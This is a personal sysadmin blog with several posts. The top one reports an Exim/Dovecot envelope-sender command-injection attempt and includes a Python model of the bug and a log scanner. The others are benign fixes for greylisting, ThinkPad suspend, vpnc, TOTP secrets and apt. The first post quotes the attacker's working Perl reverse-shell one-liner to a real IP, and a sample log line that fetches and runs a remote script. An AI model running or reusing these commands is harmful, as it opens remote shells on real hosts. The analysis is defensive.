Sunday, May 5, 2013

SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
not sure which MTA is vulnerable, yet.

...in the meantime i found that RedTeam Pentesting GmbH has a detailed advisory on the problem: "Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution".
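Why an envelope sender can turn into a shell command at all, as an added illustration (written here, not taken from the post, from Exim, from Dovecot or from the RedTeam advisory, and not the advisory's exact configuration): Exim's pipe transport normally splits its `command` into arguments first and expands each argument afterwards, so whatever `$sender_address` contains ends up as exactly one argv entry of the delivery agent. With `use_shell = true` the whole line is expanded first and handed to `/bin/sh -c`, and a local part like `"`...`"@example.net` is valid SMTP syntax that the shell treats as a command substitution. The script models the two modes with `echo` standing in for the delivery agent and a harmless `echo INJECTED` standing in for the wget/perl stage of the attempt above, then scans constructed Exim mainlog lines for senders whose local part carries shell metacharacters. The `expand` function is a minimal stand-in for Exim's expansion, and the log lines, message ids and hosts are made up.

```python
"""Envelope sender to shell command: Exim's two ways of running a pipe transport.

Added illustration; not code from the post, from Exim, from Dovecot or from the
RedTeam advisory. `expand` is a minimal stand-in for Exim's string expansion,
`echo` stands in for dovecot-lda/deliver, and the log lines are constructed.
"""
import re
import shlex
import subprocess

# A syntactically valid RFC 5321 address (quoted local part) carrying a harmless
# command substitution; the attempt this post is about fetched and ran a.pl here.
PAYLOAD = '"`echo INJECTED`"@example.net'

# Shape of a pipe-transport command that passes the envelope sender to the
# delivery agent (agent replaced by echo so this runs anywhere).
COMMAND = "echo -f $sender_address"

VAR = re.compile(r"\$(\w+)")


def expand(text, env):
    """Minimal stand-in for Exim expansion: replace $name with env[name]."""
    return VAR.sub(lambda m: env.get(m.group(1), ""), text)


def run_argv_mode(command, env):
    """Default pipe transport: split into arguments, expand each one, exec directly."""
    argv = [expand(arg, env) for arg in shlex.split(command)]
    out = subprocess.run(argv, capture_output=True, text=True, check=True).stdout
    return out.rstrip("\n")


def run_shell_mode(command, env):
    """use_shell = true: expand the whole line first, then /bin/sh -c <line>."""
    line = expand(command, env)
    out = subprocess.run(["/bin/sh", "-c", line], capture_output=True, text=True, check=True).stdout
    return out.rstrip("\n")


# --- spotting attempts in Exim's mainlog ---------------------------------------

# Constructed sample lines in the format of Exim's "<=" (message received) entries.
SAMPLE_LOG = """\
2013-05-05 10:12:01 1UYxAb-0001Qz-3K <= "`wget -O /tmp/a.pl http://192.0.2.7/a.pl;perl /tmp/a.pl`"@example.net H=(localhost) [192.0.2.7] P=esmtp S=512
2013-05-05 10:12:09 1UYxAj-0001R2-7W <= alice@example.org H=mail.example.org [203.0.113.5] P=esmtp S=2048
2013-05-05 10:12:40 1UYxB3-0001RB-2d <= <> H=mx.example.com [203.0.113.9] P=esmtp S=1200
2013-05-05 10:13:44 1UYxC7-0001RQ-1a <= "john o'brien"@example.com H=mx.example.com [203.0.113.9] P=esmtp S=901
"""

# Envelope sender after "<=": a quoted local part (may contain spaces) or a bare token.
SENDER_RE = re.compile(r' <= ("(?:[^"\\]|\\.)*"@\S+|\S+) ')
# Characters that only belong in a local part if someone hopes a shell will see it.
SHELL_META = re.compile(r"[`;|&<>]|\$\(")


def suspicious_senders(log_text):
    """Return the envelope senders whose local part contains shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = SENDER_RE.search(line)
        if not m or m.group(1) == "<>":      # "<>" is the null sender of a bounce
            continue
        sender = m.group(1)
        local_part = sender.rsplit("@", 1)[0]
        if SHELL_META.search(local_part):
            hits.append(sender)
    return hits


if __name__ == "__main__":
    env = {"sender_address": PAYLOAD}
    print("argv mode :", run_argv_mode(COMMAND, env))    # sender stays one literal argument
    print("shell mode:", run_shell_mode(COMMAND, env))   # the inner echo actually ran
    print("suspicious:", suspicious_senders(SAMPLE_LOG))
```

In argv mode the agent receives the backticks as data; in shell mode the nested `echo` has already run before the agent starts, which is the whole bug. The fix on the Exim side is therefore not to filter sender addresses but to stop handing the expanded line to a shell, i.e. to run the pipe transport without `use_shell` so the sender reaches the agent as a single argument.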

Monday, April 30, 2012

Ubuntu Precise on Lenovo Thinkpad X200s

starting from an LTS update to ubuntu precise my X200s ended up with:

legacy_resume(): pnp_bus_resume+0x0/0x70 returns -19
PM: Device 00:0a failed to resume: error -19
tpm_tis 00:0a: 1.2 TPM (device-id 0x1020, rev-id 6)
during suspend.

"blacklist tpm_tis" (itpm=1 did not help because the autodetect did this already...) and using the cgroup-lite package instead of the cgroup-bin helped (cf. https://groups.google.com/d/topic/linux.debian.kernel/kxNcotFXps8/discussion, and https://bugs.launchpad.net/ubuntu/+source/libcgroup/+bug/838729).


continuing here [http://vminko.org/gentoo_manuals/thinkpad_x200#hotkeys] i did
 - /not/ require acpi_sleep=s3_bios - quite the opposite: using it broke suspend functionality
 - not try i915.modeset=1 video=1280x800
 - not look into too many other things (because things seemed to work)


then, adding the dkms version for tp_smapi from here [http://www.thinkwiki.org/wiki/Tp_smapi] so far,
 - i am not using the hdapsd but
 - do use the Battery charge control features 

and installing the power-saving-script-for-pm from here [http://axa-ru.blogspot.com/2009/12/ubuntu-910-thinkpad-x200s-power-saving.html]
 - my X200s is doing well with Ubuntu Precise.

(well, of course, i still had to get rid of much foo to be able to start a X session with ratpoison...)

Thursday, March 1, 2012

personal reminder: Cisco vpn and vpnc

a simple task: use a Cisco configuration (written for their own VPN client) with vpnc...

reading up on Cisco's manual - to understand how the config/their client is configured - seemed like a very good idea:
http://www.cisco.com/en/US/docs/security/vpn_client/cisco_vpn_client/vpn_client46/administration/admin.html


unfortunately, i ended up with a variant of this:
Error: either "to" is duplicate, or "ipid" is a garbage.


which has been reported here:
vpnc-script incorrectly parses the output of ip route with kernels >= 2.6.38


and also found a solution here:
where it boils down to

"an old version of vpnc-script. This script is what sets up all the addresses and routes for you. The OpenConnect project provides an updated / revised release of this script. Download the latest copy from here. Replace the vpnc-script script that comes with the Ubuntu vpnc package: /etc/vpnc/vpnc-script."

Friday, October 14, 2011

combining greylisting with spam scores - working exim example

...personal experience with greylisting, some inspiration (some i can't remember anymore...), and some thoughts led to the following (implemented) idea:

let's suppose you trust the system's spam score to the extent that
- a low enough spam score is almost certainly correct, i.e. the message really is ham

why not pick a threshold low enough that first-time senders below it pass straight through, and greylist only first-time senders above it? note that exim's $spam_score_int is the spam score multiplied by ten, so the 75 below means 7.5:
[/etc/exim4/conf.d/acl/40_exim4-config_check_data.rul]

>defer
>  ...
>  log_message = message deferred: probable spam and greylistd 
>  message     = Message temporarily deferred
>  condition   = ${if and \
>                  {\
>                    { >{$spam_score_int}{75}}\
>                    {eq{grey}\
>                      {${readsocket{/var/run/greylistd/socket}\
>                                      {${mask:$sender_host_address/24} \
>                                         $sender_address \
>                                         $local_part@$domain}\
>                                        {5s}{}{}}\
>                      }\
>                    }\
>                  }\
>                }
>  delay       = 4m
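The same decision modelled outside exim, as an added example (written here; not the post's own code and not greylistd's), so the edge cases can be tried offline. The key is built the way the ACL builds it (sender netblock masked to /24, envelope sender, recipient), the exchange is the one the readsocket call performs (client writes the key, server answers "grey" or "white"), and `should_defer` is the ACL's condition. The tiny in-process server is a stand-in that answers "grey" the first time it sees a key and "white" afterwards; real greylistd also enforces a minimum retry delay and expires old entries, which is not modelled. The one caveat worth seeing is the last scenario: the empty fail-string in `${readsocket{...}{5s}{}{}}` turns an unreachable or hanging greylistd into an empty answer, `eq{grey}{}` is then false, and the message is accepted, so the check fails open.

```python
"""The ACL's spam-score-gated greylisting, modelled so its edge cases can be tried.

Added example; not the post's own code and not greylistd. The in-process
server is a stand-in for greylistd (no retry delay, no expiry).
"""
import ipaddress
import os
import socket
import tempfile
import threading

SPAM_THRESHOLD_INT = 75   # $spam_score_int is the score times ten, so this is 7.5
READ_TIMEOUT = 5.0        # the {5s} in the readsocket expansion


def triplet(sender_host_address, sender_address, recipient):
    """${mask:$sender_host_address/24} $sender_address $local_part@$domain"""
    net = ipaddress.ip_network(f"{sender_host_address}/24", strict=False)
    return f"{net} {sender_address} {recipient}"


def query_greylistd(socket_path, key, timeout=READ_TIMEOUT):
    """Model of ${readsocket{socket}{key}{5s}{}{}}: the answer, or "" when the socket
    cannot be reached or does not answer in time (the empty fail-string in the ACL)."""
    try:
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect(socket_path)
            s.sendall(key.encode())
            return s.recv(64).decode().strip()
    except OSError:          # covers socket.timeout and "no such socket"
        return ""


def should_defer(spam_score_int, greylist_answer):
    """The ACL's condition: defer only if the score is above the threshold AND the
    triplet is new. "" (greylistd unreachable) therefore means accept: it fails open."""
    return spam_score_int > SPAM_THRESHOLD_INT and greylist_answer == "grey"


class FakeGreylistd(threading.Thread):
    """Stand-in for greylistd: "grey" on first sight of a key, "white" afterwards."""

    def __init__(self, path):
        super().__init__(daemon=True)
        self.seen = set()
        self.srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.srv.bind(path)          # bind/listen before start(), so early clients queue up
        self.srv.listen(5)

    def run(self):
        while True:
            conn, _ = self.srv.accept()
            with conn:
                key = conn.recv(1024).decode()
                conn.sendall(b"white" if key in self.seen else b"grey")
                self.seen.add(key)


def start_fake_greylistd():
    """Start the stand-in on a fresh unix socket and return the socket path."""
    path = os.path.join(tempfile.mkdtemp(), "socket")
    FakeGreylistd(path).start()
    return path


def run_scenario(socket_path):
    """Walk four messages through the check; returns (label, deferred?) pairs."""
    new_spammy = triplet("203.0.113.77", "offer@example.net", "me@example.org")
    new_clean = triplet("198.51.100.5", "friend@example.com", "me@example.org")
    return [
        ("first attempt, score 9.1", should_defer(91, query_greylistd(socket_path, new_spammy))),
        ("retry, score 9.1", should_defer(91, query_greylistd(socket_path, new_spammy))),
        ("first-time sender, score 2.0", should_defer(20, query_greylistd(socket_path, new_clean))),
        # socket path that does not exist: readsocket's fail-string "" -> accepted
        ("greylistd down, score 9.1", should_defer(91, query_greylistd(socket_path + ".gone", new_clean))),
    ]


if __name__ == "__main__":
    for label, deferred in run_scenario(start_fake_greylistd()):
        print(f"{label:30} -> {'defer' if deferred else 'accept'}")
```

If failing open is not what you want, give the readsocket call a non-empty fail-string and test for it explicitly in the ACL, or defer on expansion failure; as written, a stopped greylistd quietly disables the greylisting half of the check while leaving the spam-score half looking intact.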

Sunday, March 6, 2011

personal reminder: ratpoison and an empty, gray java GUI

"How to un-break graphical Java apps under Ratpoison" suggests wmname to make the JVM believe it runs on a different window manager:
$ wmname LG3D
tells the JVM it is running under LG3D (Project Looking Glass, a desktop using 3D aspects in its UI), a non-reparenting window manager written by Sun that is on the JDK's hard-coded list of known non-reparenting window managers; for an unknown window manager AWT assumes reparenting and waits for a reparent that ratpoison never performs, which is what leaves the frame empty and gray.

note for OpenJDK: according to this post "versions of OpenJDK that ship with some operating system distributions—at least Debian (and Ubuntu) and Arch Linux in March and August of 2009, respectively—have had this problem fixed by the vendors."

Friday, March 4, 2011

Manually add account to Google Authenticator - Enter key in Base32 Encoding

wanted to use OpenID with multi-factor authentication as a single sign-on (SSO) for online services; in particular, i wanted to combine a regular password with a one-time password, namely a TOTP token.

Google Authenticator supports TOTP, and not only for their own 2-step verification but one can "Manually add" other accounts.

The bridging part from TOTP to OpenID, in my case, comes from Clavid (cf. OTP@Clavid).

Now to the tiny bit of information that might save you quite some minutes: when entering your secret key into these two locations to set-up an account

  • Google Authenticator expects the string to be RFC 4648 Base32 encoded
  • Clavid expects the string to be hex encoded
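Converting one secret between the two encodings, and checking that both sides will produce the same code, as an added example (written here; not code from the post, from Google Authenticator or from Clavid). It uses the RFC 6238 reference secret "12345678901234567890" so the numbers can be checked against the RFC's test vector (SHA-1, T=59, 8 digits gives 94287082); swap in your own key bytes. The `looks_like_base32` check covers the mistake the post is saving you from: Base32's alphabet is A-Z and 2-7, so a hex string containing 0, 1, 8 or 9 is not even valid Base32, and a hex string that happens to avoid those digits would decode to the wrong key bytes without any error.

```python
"""One TOTP secret in the two encodings the two sides expect.

Added example; not from the post, Google Authenticator or Clavid. The secret
is the RFC 6238 reference key, not a real one.
"""
import base64
import hashlib
import hmac
import struct
import time

RFC6238_SECRET = b"12345678901234567890"   # reference key from the RFC, for checking only

B32_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=")


def hex_to_base32(hex_secret):
    """What Google Authenticator's 'Manually add' wants (RFC 4648 Base32, padding dropped)."""
    return base64.b32encode(bytes.fromhex(hex_secret)).decode("ascii").rstrip("=")


def base32_to_hex(b32_secret):
    """What Clavid wants. Tolerates the lowercase letters and spaces people type in."""
    s = b32_secret.replace(" ", "").upper()
    s += "=" * (-len(s) % 8)                 # restore the padding Base32 decoders require
    return base64.b32decode(s).hex()


def looks_like_base32(s):
    """False for any hex string containing 0, 1, 8 or 9; True does not prove the
    string was meant as Base32, only that a decoder will accept it."""
    return set(s.replace(" ", "").upper()) <= B32_ALPHABET


def hotp(key, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226: HMAC over the big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(key, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def totp(key, at=None, step=30, digits=6):
    """RFC 6238: HOTP with the counter set to floor(unix time / step)."""
    if at is None:
        at = time.time()
    return hotp(key, int(at // step), digits)


def same_code(hex_secret, b32_secret, at):
    """The check to run after entering both: hex on one side, Base32 on the other,
    same code at the same time."""
    return totp(bytes.fromhex(hex_secret), at) == totp(bytes.fromhex(base32_to_hex(b32_secret)), at)


if __name__ == "__main__":
    hex_key = RFC6238_SECRET.hex()
    b32_key = hex_to_base32(hex_key)
    print("hex    (Clavid):              ", hex_key)
    print("base32 (Google Authenticator):", b32_key)
    print("TOTP at T=59, 8 digits:       ", totp(RFC6238_SECRET, 59, digits=8))
    print("hex string valid as base32?   ", looks_like_base32(hex_key))
    print("both sides agree now?         ", same_code(hex_key, b32_key, time.time()))
```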

Tuesday, January 4, 2011

personal reminder: rfkill to toggle bluetooth

toggling bluetooth (on a Lenovo ThinkPad X200s / Ubuntu 10.x) via rfkill:
rfkill list
rfkill block 0
rfkill unblock 0
(0 is the index that rfkill list shows for the bluetooth device here and may differ on another machine; rfkill block bluetooth addresses the device by type instead of by index.)

Sunday, November 28, 2010

Online Tasks Service for Thunderbird/Lightning

Thunderbird/Lightning has been working with Google Calendar for a while now [cf. link]. however, Tasks are not supported as can be seen in this thread and also here.

now, is there another service for Tasks available?

for some time i have been using Chandler but with recent developments TB/Lightning+Chandler stopped working (and they haven't quite figured out who's to blame...).

ironically, Yahoo comes to the rescue: following this post and going further here Tasks with Yahoo actually work.

Friday, October 15, 2010

Reverse Tethering an Android Phone via USB

until recently i was stuck with a stock android 1.6 - and USB tethering was somewhat adventurous (Tetherbot was an option, connectbot another... both worked best, i.e. without restrictions, when there was a VPN tunneled 'over' either of them.) 

android 2.2 comes with USB tethering: in 'Wireless & network settings' - just need to turn it on... and a network interface will be 'exposed' via USB, network-manager (e.g. in ubuntu) will show the new device, and go.

now, this set-up can also be used the other way around (i.e. use the computer's internet connection the mobile is connected to). however, android's ConnectivityManager does not recognize this connection in such a way that services like Contacts Sync would get going.

startUsingNetworkFeature() in http://android.git.kernel.org/?p=platform/frameworks/base.git;a=blob;f=services/java/com/android/server/ConnectivityService.java will choke on android.net.NetworkInfo.isAvailable():
D/ConnectivityService( 166): getMobileDataEnabled returning true
D/ConnectivityService( 166): special network not available

...let's see.

Tuesday, August 10, 2010

aptitude or apt-get - only update security updates

two quick possibilities to install security updates only (via apt-get and/or aptitude in debian, ubuntu, ...):
  1. uses a dedicated sources file: http://www.debian-administration.org/articles/241#comment_20
  2. uses a search pattern: http://ubuntuforums.org/showpost.php?p=9161314&postcount=3